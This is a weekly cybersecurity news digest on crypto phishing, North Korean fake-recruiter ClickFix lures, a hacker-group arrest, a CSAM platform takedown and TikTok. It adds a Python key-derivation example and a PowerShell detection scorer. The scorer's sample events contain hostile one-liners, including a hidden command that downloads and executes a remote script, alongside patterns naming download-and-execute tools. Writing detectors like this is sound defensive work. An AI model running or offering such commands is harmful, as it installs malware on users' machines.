Seed-Phrase Poison, a Contagious "Coinbase Job Opening" and Other Cybersecurity Developments

We've compiled the most important news from the world of cybersecurity for the week.


Coinbase and Ledger customers targeted by phishing emails that plant attacker-controlled seed phrases

SilentPush analysts detected a phishing campaign, tracked as PoisonSeed, that mails out seed phrases in order to steal cryptocurrency.

In the first stage, the attackers set up fake login pages for well-known mass-mailing platforms, including Mailchimp, SendGrid, HubSpot, Mailgun and Zoho. With the credentials harvested there they take over the mailing accounts of various marketing teams and send the spam through them. The targets are Coinbase exchange customers and owners of Ledger hardware wallets.

The email is usually an urgent notification in the style of "Coinbase is switching to self-custody wallets" and contains a seed phrase. The recipient is told to enter that phrase when creating a new wallet, ostensibly for a "secure asset transfer" as part of an upgrade or migration.

Fake email on behalf of Coinbase. Source: SilentPush.

If the victim follows this instruction and moves funds into the new wallet, the attacker gains full control over them: the seed phrase determines the wallet's keys, and the attacker already holds the phrase.
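Why a borrowed seed phrase hands over the wallet: the mnemonic is stretched into a 64-byte seed (BIP39) and the seed into a master private key (BIP32) by fixed, public functions, so every party holding the phrase derives the same key. The following is an added example in Python, not code from SilentPush or from any wallet vendor; the phrase used is the BIP39 reference test phrase (not a live wallet), and the function names are this example's own.

```python
import hashlib
import hmac
import unicodedata


def bip39_seed(mnemonic: str, passphrase: str = "") -> bytes:
    """BIP39 seed: 2048 rounds of PBKDF2-HMAC-SHA512 over the NFKD-normalised
    mnemonic, salted with "mnemonic" + passphrase, producing 64 bytes.
    Extra whitespace is collapsed so copy-pasted phrases compare equal."""
    words = " ".join(unicodedata.normalize("NFKD", mnemonic).split())
    salt = "mnemonic" + unicodedata.normalize("NFKD", passphrase)
    return hashlib.pbkdf2_hmac(
        "sha512", words.encode("utf-8"), salt.encode("utf-8"), 2048, dklen=64
    )


def bip32_master_key(seed: bytes) -> tuple[bytes, bytes]:
    """BIP32 master node: HMAC-SHA512 keyed with b"Bitcoin seed".
    The left 32 bytes are the master private key, the right 32 the chain code."""
    digest = hmac.new(b"Bitcoin seed", seed, hashlib.sha512).digest()
    return digest[:32], digest[32:]


def master_key_from_mnemonic(mnemonic: str, passphrase: str = "") -> bytes:
    """Mnemonic -> seed -> master private key, end to end."""
    return bip32_master_key(bip39_seed(mnemonic, passphrase))[0]


# Constructed example input: the phrase an attacker would paste into a
# "migration" email. This is the BIP39 reference test phrase, not a real wallet.
ATTACKER_SUPPLIED_PHRASE = "abandon " * 11 + "about"


def attacker_and_victim_agree() -> bool:
    """The attacker drafted the phrase; the victim imports it. Both sides run
    the same public derivation and end up with byte-identical master keys,
    which is why funds moved into that wallet belong to the attacker."""
    victim_key = master_key_from_mnemonic(ATTACKER_SUPPLIED_PHRASE)
    attacker_key = master_key_from_mnemonic(ATTACKER_SUPPLIED_PHRASE)
    return victim_key == attacker_key


if __name__ == "__main__":
    print("identical master keys:", attacker_and_victim_agree())
```

A BIP39 passphrase changes the derived key, but it does not help here: the attacker controls the instructions and can simply tell the victim to leave it empty. The only defence is never to import a phrase that someone else has seen.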

DPRK hackers posed as recruiters for major cryptocurrency exchanges

Sekoia experts described a new ClickFix-style tactic that the North Korean Lazarus Group has begun using against job applicants in the AI and cryptocurrency industries.

Candidates receive invitations to fake interview sites. When they open the site and try to view its content, they are shown an error, and the page offers to "fix" the problem by running PowerShell commands that in fact download malware.
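The lure ends with the victim pasting a PowerShell one-liner, so the endpoint telemetry shows a user-launched PowerShell process whose command line fetches and executes remote content. The following added example (Python, not from the Sekoia report) scores process-creation events against that pattern. The event records are constructed for illustration and use Sysmon-style field names; the cue list, weights, threshold and the assumption that Run-dialog launches appear with explorer.exe as parent are this example's own heuristics, not a signature published by Sekoia.

```python
import ntpath
import re

# Cue patterns and weights: this example's own heuristics for a pasted
# download-and-execute one-liner. Names are illustrative.
CUES = {
    "download": (2, re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"downloadfile|net\.webclient|start-bitstransfer|curl|wget)\b", re.I)),
    "exec": (2, re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    "encoded": (3, re.compile(r"\s-(e|ec|en|enc|encodedcommand)\b", re.I)),
    "hidden": (1, re.compile(r"-(w|win|windowstyle)\s+hidden\b", re.I)),
    "bypass": (1, re.compile(r"-(ep|exec|executionpolicy)\s+bypass\b", re.I)),
}
POWERSHELL = ("powershell.exe", "pwsh.exe")
# Assumption: a user pasting into Win+R / the Run dialog yields explorer.exe as parent.
INTERACTIVE_PARENTS = ("explorer.exe",)

# Constructed process-creation records (Sysmon Event ID 1 style), not real logs.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://interview.example/fix.ps1 -UseBasicParsing | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"},
    {"ParentImage": r"C:\Program Files\Build\msbuild.exe",            # benign build step
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh -File build.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",                       # benign interactive use
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Date"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",               # scheduled download, no execution
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -c "Invoke-WebRequest -Uri https://intranet.example/inventory.csv -OutFile C:\temp\i.csv"'},
]


def score(event: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation event.
    Non-PowerShell images score zero; each matching cue adds its weight,
    and an interactive parent adds one more point."""
    image = ntpath.basename(event["Image"]).lower()
    if image not in POWERSHELL:
        return 0, []
    total, reasons = 0, []
    cmd = event["CommandLine"]
    for name, (weight, pattern) in CUES.items():
        if pattern.search(cmd):
            total += weight
            reasons.append(name)
    if ntpath.basename(event["ParentImage"]).lower() in INTERACTIVE_PARENTS:
        total += 1
        reasons.append("interactive_parent")
    return total, reasons


def flag(events: list[dict], threshold: int = 4) -> list[int]:
    """Indices of events whose score reaches the threshold. A lone download
    or a lone interactive launch is deliberately below it; download plus
    execute, or an encoded command from an interactive parent, is above."""
    return [i for i, ev in enumerate(events) if score(ev)[0] >= threshold]


if __name__ == "__main__":
    for i in flag(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["CommandLine"], score(SAMPLE_EVENTS[i])[1])
```

The weights are deliberately coarse: the point is that "download" and "execute" cues together, or an encoded command typed by a user, are far rarer in legitimate activity than either cue alone, so a rule on the combination stays quiet on build servers and admin scripts while catching the ClickFix shape.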

In this campaign, hackers impersonate well-known crypto projects including Coinbase, KuCoin, Kraken, Circle, Securitize, BlockFi, Tether, Robinhood and Bybit.

Brands used by hackers. Source: Sekoia.

In addition to stealing cryptocurrency, the malware can perform file operations, run shell commands, steal cookies, browsing history and stored passwords, and collect system metadata.

Members of the group that hacked the NATO portal suggest their leader has been arrested

A member of SiegedSec, the hacker group responsible for breaching a NATO portal, The Heritage Foundation think tank and a nuclear laboratory in Idaho, has suggested that the FBI raided the home of the group's leader, known as vio, and arrested her. This was reported by the Daily Dot, citing a March 26 tweet.

A day later, a new post noted that "the silence surrounding the SiegedSec case is troubling."

Details on the situation are few. SiegedSec dissolved in July 2024 after a warning from executives at The Heritage Foundation that information about the hackers had been turned over to the FBI. However, the bureau has not publicly announced an investigation or any charges.

Europol shut down the Kidflix child sexual abuse platform

German law enforcement, together with Dutch colleagues, shut down Kidflix, one of the largest darknet platforms for distributing child sexual abuse material (CSAM). The operation began in 2022 and concluded on March 11, 2025, but details have only now been disclosed.

During the operation, 79 people were arrested, 1,393 suspects were identified, and more than 3,000 electronic devices were seized. The site's server was also confiscated.

Source: Europol.

Since its launch in 2021, Kidflix hosted more than 91,000 unique videos totaling 6,288 hours. Its user base exceeded 1.8 million. Users paid for content in cryptocurrency and could earn internal tokens for activity on the platform.

The case file has been handed over to investigative authorities in 35 countries for further work with the suspects.

Paradigm profiled North Korea's top crypto-hacking groups

Paradigm has prepared a detailed report on North Korean cybercrime groups behind attacks on organizations and individuals around the world. 

In addition to the best-known group, Lazarus, the experts described Contagious Interview and Wagemole, two operations built around IT job recruitment. The hackers steal a wide range of data, including cryptocurrency.

AppleJeus spreads malware disguised as trading apps and crypto utilities, while Dangerous Password uses social engineering to attack digital asset holders.

The analysts named TraderTraitor the most sophisticated of the groups: it targets cryptocurrency exchanges and large industry players, breaching them with highly targeted spear-phishing.

The U.S. blocking of TikTok has been postponed

On April 4, US President Donald Trump extended by 75 days the deadline given to ByteDance, the company that owns the TikTok service, to sell US assets to avoid being blocked. The head of state expressed hope for continued "good faith cooperation with China."

Reuters, citing sources, reported that the deal was put on hold by the Chinese side after the United States imposed a 54 percent tariff on imports of Chinese goods.